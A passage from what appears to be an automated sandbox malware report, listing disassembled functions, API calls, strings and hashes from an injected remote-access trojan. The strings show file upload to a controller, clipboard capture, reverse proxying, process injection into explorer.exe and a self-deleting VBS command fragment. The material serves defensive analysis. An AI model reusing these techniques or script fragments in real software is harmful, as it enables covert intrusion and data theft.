                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                  • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                  • API String ID: 3086580692-2582957567
                                                  • Opcode ID: 308882c0448e535688a7e0640146a2f76127042e10cb9c8ee9ee13ba12442b6c
                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                  • Opcode Fuzzy Hash: 308882c0448e535688a7e0640146a2f76127042e10cb9c8ee9ee13ba12442b6c
                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                  • _free.LIBCMT ref: 0045137F
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004513A1
                                                  • _free.LIBCMT ref: 004513B6
                                                  • _free.LIBCMT ref: 004513C1
                                                  • _free.LIBCMT ref: 004513E3
                                                  • _free.LIBCMT ref: 004513F6
                                                  • _free.LIBCMT ref: 00451404
                                                  • _free.LIBCMT ref: 0045140F
                                                  • _free.LIBCMT ref: 00451447
                                                  • _free.LIBCMT ref: 0045144E
                                                  • _free.LIBCMT ref: 0045146B
                                                  • _free.LIBCMT ref: 00451483
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                  • API String ID: 489098229-1431523004
                                                  • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                  • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.KERNELBASE(00000000), ref: 00413773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-3159800282
                                                  • Opcode ID: aa01c724678a77a7f266d250699ed78b0e530eeae90dcf4a694e4abb02ef66b9
                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                  • Opcode Fuzzy Hash: aa01c724678a77a7f266d250699ed78b0e530eeae90dcf4a694e4abb02ef66b9
                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                  • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                  APIs
                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: \&G$\&G$`&G
                                                  • API String ID: 269201875-253610517
                                                  • Opcode ID: 0824e7aa1874106c2a06b8faea0234afc0e854fad8f6d89c65d52aec9f97b586
                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                  • Opcode Fuzzy Hash: 0824e7aa1874106c2a06b8faea0234afc0e854fad8f6d89c65d52aec9f97b586
                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                  • _free.LIBCMT ref: 0043A9C3
                                                  • _free.LIBCMT ref: 0043A9CA
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                  • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: b87731fb503d42a826b26b577ec8f4d2f0dc56853f71806153c45a12b13608ac
                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                  • Opcode Fuzzy Hash: b87731fb503d42a826b26b577ec8f4d2f0dc56853f71806153c45a12b13608ac
                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                  APIs
                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                  • String ID: 0VG$0VG$<$@$Temp
                                                  • API String ID: 1704390241-2575729100
                                                  • Opcode ID: 1f4ea72e5bc9cb7386a723adfcf242e1c05a3e4e3cccfc6c923460f8c05d2709
                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                  • Opcode Fuzzy Hash: 1f4ea72e5bc9cb7386a723adfcf242e1c05a3e4e3cccfc6c923460f8c05d2709
                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 0041697C
                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID: !D@
                                                  • API String ID: 2172192267-604454484
                                                  • Opcode ID: 54ae824a5ef4c62f5e724e6d28d31a955321368d1ed9c7ed2da733efeea4bed7
                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                  • Opcode Fuzzy Hash: 54ae824a5ef4c62f5e724e6d28d31a955321368d1ed9c7ed2da733efeea4bed7
                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                  • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                  APIs
                                                  • _free.LIBCMT ref: 004481B5
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004481C1
                                                  • _free.LIBCMT ref: 004481CC
                                                  • _free.LIBCMT ref: 004481D7
                                                  • _free.LIBCMT ref: 004481E2
                                                  • _free.LIBCMT ref: 004481ED
                                                  • _free.LIBCMT ref: 004481F8
                                                  • _free.LIBCMT ref: 00448203
                                                  • _free.LIBCMT ref: 0044820E
                                                  • _free.LIBCMT ref: 0044821C
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                  • API String ID: 3578746661-3604713145
                                                  • Opcode ID: 54adb1009180d77f9e77df3f682b0ee10071b8bfa67ce72801527200a3dd21ca
                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                  • Opcode Fuzzy Hash: 54adb1009180d77f9e77df3f682b0ee10071b8bfa67ce72801527200a3dd21ca
                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 46f53da0714e3248ef3b91eb930f3635b2578f9df04302daa37656704b7ccdf6
                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                  • Opcode Fuzzy Hash: 46f53da0714e3248ef3b91eb930f3635b2578f9df04302daa37656704b7ccdf6
                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004074D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                  • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401D50
